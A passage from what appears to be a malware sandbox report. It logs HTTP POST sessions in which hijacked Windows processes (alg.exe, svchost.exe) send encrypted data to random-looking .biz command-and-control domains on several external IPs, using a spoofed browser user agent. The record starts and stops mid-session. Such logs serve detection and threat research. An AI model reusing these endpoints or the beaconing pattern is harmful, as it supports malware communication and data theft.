                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=92fff9204b1514f820620f8d7c2c5f3d|8.46.123.33|1728394083|1728394083|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              11192.168.2.44974544.221.84.105802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.099329948 CEST351OUTPOST /dgeuecv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.099348068 CEST778OUTData Raw: e7 ff 51 3f b9 ad 1c 9e fe 02 00 00 55 72 05 0e 07 99 e0 9c 84 8f c6 d0 84 39 cd dd 0b 8d b2 1d 51 a2 a8 59 1f e7 66 93 ba 6e b2 3c bb f7 c1 b8 48 b9 0c b8 76 2b 43 91 d6 46 c6 d3 d1 81 95 e2 0d b3 91 c2 bb 98 3a 18 f3 2f 95 0d d0 17 55 aa 5e c2
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Q?Ur9QYfn<Hv+CF:/U^p]aWZkUOPmt>c'<X{4nuLzrhoe5uA(VPyg4M/t^{eBtJ&G\*7SwVscj'o%CLb+@Y
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.332451105 CEST1129OUTPOST /dgeuecv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: e7 ff 51 3f b9 ad 1c 9e fe 02 00 00 55 72 05 0e 07 99 e0 9c 84 8f c6 d0 84 39 cd dd 0b 8d b2 1d 51 a2 a8 59 1f e7 66 93 ba 6e b2 3c bb f7 c1 b8 48 b9 0c b8 76 2b 43 91 d6 46 c6 d3 d1 81 95 e2 0d b3 91 c2 bb 98 3a 18 f3 2f 95 0d d0 17 55 aa 5e c2 70 84 e4 5d 61 57 bc d5 5a ae 6b 55 a9 4f c8 50 fb dc a8 cb 6d 88 12 74 e9 c2 a1 cb d0 3e 63 8a 19 0a e1 82 93 27 3c da 58 1f 95 bd d0 7b 19 34 1e 6e b3 99 75 a9 fc cc d2 4c e2 7a 72 68 96 87 01 6f 65 35 09 75 e8 41 04 d8 fd 15 ae b7 28 06 a8 56 c0 50 79 95 67 1f 34 4d 83 84 b3 84 e2 e0 96 2f 87 74 5e 7b 0a a6 65 42 1f ac ac 74 4a f7 e0 f9 cd 26 9e 9d ed 1a b7 47 a7 d6 19 5c 2a 18 37 8d 53 a8 77 56 73 63 1a 6a 27 b5 05 6f 25 bd dd a4 d9 82 9d 43 0c 88 4c 62 8d 95 2b 40 fa 87 59 9f 52 a5 97 de 8c de 1c 62 2e f5 e1 69 1b 76 d2 2e 43 00 9c 55 d2 43 81 e8 65 a7 df c6 7d 87 ab 3e 8a bb 36 bb 2d 57 a0 ed ae fa c0 de 44 3a d8 26 ca 95 28 61 df ef 26 50 8d a1 96 98 f1 fe bd 70 7c fb 3b 7b a8 d5 01 b0 32 79 3a 10 e9 bd de 19 8d 4a 29 2e cd 36 09 e1 46 c7 bc 4a 9a 50 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Q?Ur9QYfn<Hv+CF:/U^p]aWZkUOPmt>c'<X{4nuLzrhoe5uA(VPyg4M/t^{eBtJ&G\*7SwVscj'o%CLb+@YRb.iv.CUCe}>6-WD:&(a&Pp|;{2y:J).6FJP66\89~H`n@>g$D;$n9Eo/wY^<$?U rq9qw,b/71EQIv{XlrGgI|Q+Db92ut*4a|'"|~9b+I/xQxilAuT~B$C/"w.|B^Zrw7v&@xun(jKo5z$!\m gV&w_G]-M+e!J<PtDjK<gy6$H=|f11KIjLvR3SgE%wz
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.578183889 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=013a5df1149102c3daa059dccf5cef5f|8.46.123.33|1728394084|1728394084|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              12192.168.2.44974682.112.184.197804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.364875078 CEST353OUTPOST /ddsolxmfcvq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.364906073 CEST786OUTData Raw: af 98 c6 f2 f7 37 bc cd 06 03 00 00 53 f3 15 7d c6 7a 4d 33 12 9e a7 40 4f 4a c4 83 d5 69 00 c2 14 d0 dd 14 e7 9f 0f 12 65 74 64 5f 7a b9 ba 94 da 0b 92 3b e2 89 a0 65 48 8c f5 f4 94 52 b9 85 61 4a 25 d6 93 d2 4d 22 a6 c2 68 d9 98 95 c4 56 fd 8c
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 7S}zM3@OJietd_z;eHRaJ%M"hVi"=tC6hcpT(/1(8$eDWm^uNGzzoJ1>|Rk$*Q\'/ZO<2;)^\VLbw=C;^w8t>Wkqj


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              13192.168.2.449748172.234.222.143802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.837467909 CEST353OUTPOST /nljwtdwahh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.837492943 CEST778OUTData Raw: 8f 18 9c 26 fa 13 38 ec fe 02 00 00 a1 f1 e6 cf b4 46 26 99 79 0f c8 ad 90 80 04 d9 79 c7 d3 6c 44 20 13 8e 65 84 f9 6f b1 39 bd 3e 05 1b af f8 6c 4c 63 3c ad e1 81 62 44 26 d1 25 ee 01 91 99 3c 28 4a 2f 3c 6f 8d 36 ad b8 0f 05 f3 8b 80 fd bf 4e
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &8F&yylD eo9>lLc<bD&%<(J/<o6N'e7Xw>UG{P,aE>t,!Zy(a?&3KHX$ny~LYN=k`Gi Gwyhe|


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              14192.168.2.449749172.234.222.143802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.429399967 CEST347OUTPOST /xjjg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:05.429419041 CEST778OUTData Raw: 23 c2 11 8e 03 51 14 bb fe 02 00 00 a4 43 c8 ef 9e 23 49 57 a0 53 aa a0 e7 62 b1 d3 4c b2 91 89 f7 8d d3 ff 6d 26 c0 fe 06 0d 7d ed ef 7c b7 bd ac 7f 93 0b 28 80 3e 40 17 f7 35 0b 35 d0 ee a9 aa 8b 78 c3 a3 49 ba 06 ce 1a 49 8c 01 85 a9 32 99 40
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: #QC#IWSbLm&}|(>@55xII2@NRi["b7a;I<GaSwUH.GWiGT/V)ZN7f#$`5eP3 4)'""?90F[3g.Y]<L


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              15192.168.2.44975118.141.10.107802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.130330086 CEST358OUTPOST /ibdxbfqrqufvuu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.130623102 CEST778OUTData Raw: 66 4b 1f 8b 3d 37 4a 83 fe 02 00 00 6f 0c f5 c7 86 08 6f 80 27 c6 8b b9 1e d4 f5 32 0c cb b1 bc 35 70 2a 15 50 92 2c 2e 3d d1 77 51 76 03 4f b5 f7 58 b3 bf 82 68 81 a6 02 de 0b 04 45 8e 26 1b 6c a5 78 93 a9 d9 d5 74 0a e1 8e 9f ff 8f fc e8 4a 4f
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: fK=7Joo'25p*P,.=wQvOXhE&lxtJO3<^Knmo?LQ`WB</}?[L10}5\,^nlj]OA)uLw[bx1rfOs<Ju#2$0xJ,}qVSYXn?`.[Lc


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              16192.168.2.44975418.141.10.107802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.892771959 CEST349OUTPOST /byear HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.892819881 CEST778OUTData Raw: 74 f5 a8 5d 87 1e 4c 58 fe 02 00 00 eb fd d0 e5 3f b4 13 5f 1a 20 ab 87 ed 7b ad 98 a7 a0 79 0f 0c ad 5d 66 c9 7d c6 8d df 83 3c 06 eb 33 0e e5 9f 32 00 7c 3f 5e c6 06 89 ce a5 13 70 13 e5 b7 2c bb f7 82 2f cd 84 fd cb ab e0 fa a3 ce ac a7 98 3d
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t]LX?_ {y]f}<32|?^p,/=GM8aRxYG7<~*d}&eafu:>8D*OAj1x*J^.3.,Kt}+OcH:r&t1("qk
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:08.226094007 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=949a55cf794fa47f3f53facd7d1281fb|8.46.123.33|1728394087|1728394087|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              17192.168.2.44975782.112.184.197802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:08.384218931 CEST347OUTPOST /ipnvn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:08.384243011 CEST778OUTData Raw: ad 87 63 41 43 9b ea a7 fe 02 00 00 d2 17 7d 6c 54 cb f6 6d b5 d1 a5 58 e3 ed 8d 2e 30 19 de 17 0a ae 7d 03 c3 08 60 0f b1 4b 5e 5b 7b 96 6e 2c 9d 13 35 46 d6 a9 2b b9 13 b1 63 6b a6 a7 e0 04 2d 54 a2 07 f6 89 71 1a 29 cd 98 db a1 9c 4f 69 62 17
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: cAC}lTmX.0}`K^[{n,5F+ck-Tq)Oib_M`rub@!aKm*Zvfx]2~<CFum-_uS.o6TM2GOJfV]zP_59TWr}dW9


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              18192.168.2.44976082.112.184.197802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:10.484137058 CEST343OUTPOST /w HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:10.484159946 CEST778OUTData Raw: e0 54 d2 79 10 d7 4a 4a fe 02 00 00 e7 9f a4 bf 53 16 bf 93 ed 69 0c ec e7 bd d2 ae 72 c9 aa 81 34 f9 7e ed 45 8d fb 29 66 c2 65 27 19 6c b3 98 a1 ba ab 40 0e 84 cf 01 3a f5 e2 6a 29 8a 86 86 d7 78 67 24 d6 88 10 7d fa d9 49 4d e6 03 93 15 b5 f7
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: TyJJSir4~E)fe'l@:j)xg$}IMO&`TzIO-t1?`/ u/Ch!P%`.h2f>%[2c|;5S*#uYCb\&"-5rT+sE^Y,wqxx%7JylGQD


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              19192.168.2.44976382.112.184.197802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:14.768028021 CEST349OUTPOST /liar HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:14.768050909 CEST778OUTData Raw: 61 46 95 5f d1 3b 29 8c fe 02 00 00 5b 72 9c 0c c6 60 ba 57 37 2f 43 40 81 91 6c 3d d0 d2 a1 3b 79 71 b8 6b ce d1 8d 48 f5 4f 50 07 d2 0d 5d 48 0e 72 b3 52 78 13 80 54 f1 16 c9 11 18 09 00 d2 6b cd 15 89 cb 32 7c a5 9f c4 2d eb b5 db 23 c0 31 21
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: aF_;)[r`W7/C@l=;yqkHOP]HrRxTk2|-#1!F!k6mSSSPV2_^f&T*RD}_Tc*.CT[gMUdXO]>':8;dMf\Qn]%?=U$,!|c0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              20192.168.2.44976882.112.184.197804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:25.780258894 CEST353OUTPOST /jpdlcoeoakm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:25.780284882 CEST786OUTData Raw: 6e c6 e7 b9 98 2c 4b 0a 06 03 00 00 cc 25 b2 f3 b8 c4 cd ba 7a dd b3 b4 64 dc 91 67 dd e3 b6 c1 b1 24 b2 24 6c 5a 7f b1 27 fd 4a 8a 5e 62 e5 d6 45 39 7b b6 7c b8 9c 8a fc da 88 67 02 3d d7 ba e0 c7 1d d5 c2 d0 ee 0b 9e b4 1a 56 f6 88 30 5a e2 f3
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: n,K%zdg$$lZ'J^bE9{|g=V0Zb4cf2"g*1~MENYXGP;nwztR]c;zP~Qg>$Ml6X-4nzIN?J_``,_+,k.jsX*944DQT{1]`>b/c,


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              21192.168.2.44977082.112.184.197804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.479329109 CEST346OUTPOST /d HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.479382038 CEST786OUTData Raw: 31 3f 03 59 24 4e 5f ec 06 03 00 00 38 3e 47 7d 8e f6 09 62 85 c4 5f dd 36 fb 07 b9 b9 03 86 49 05 d6 a1 21 31 0e 5a a4 9a 7a 79 00 12 01 5f 95 2c 0a ac dc f2 8d a2 db d5 96 98 28 5a a2 0c ad d2 9f ae cb ad 5a 04 a5 57 3e 70 4f 04 2d b9 6d 08 34
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 1?Y$N_8>G}b_6I!1Zzy_,(ZZW>pO-m4((QN-=k4XvGm@xt"L(--0==V}11.#MUSoMuLoK1U(RU|7.zO3hHC >Z


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              22192.168.2.44977382.112.184.197804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:32.446002960 CEST359OUTPOST /emmmpldkokdghu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:32.446026087 CEST786OUTData Raw: 1d f0 d1 94 c6 b0 a6 14 06 03 00 00 28 a0 4d dd 85 30 0e 82 4b 05 f4 2a 01 4c de 85 70 fe 57 ef 42 4f e3 f7 2f 95 3f b3 b3 d2 52 ae b9 43 bf ac 18 a8 74 b9 95 0e 9e 36 75 89 ec 33 9b e4 8a b4 61 f2 89 2b ac cd f9 8f ba a8 4a 14 9d 1e f6 d9 2b 9c
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (M0K*LpWBO/?RCt6u3a+J+s*Q&#TyJoN(Z`dHML>Mq"`B08`M+fA9[B1lNKGI_qrOa^` L|!Z!9apv9/


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              23192.168.2.44977682.112.184.197802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:36.256407976 CEST358OUTPOST /eyywnnlobvqfg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: vjaxhpbji.biz
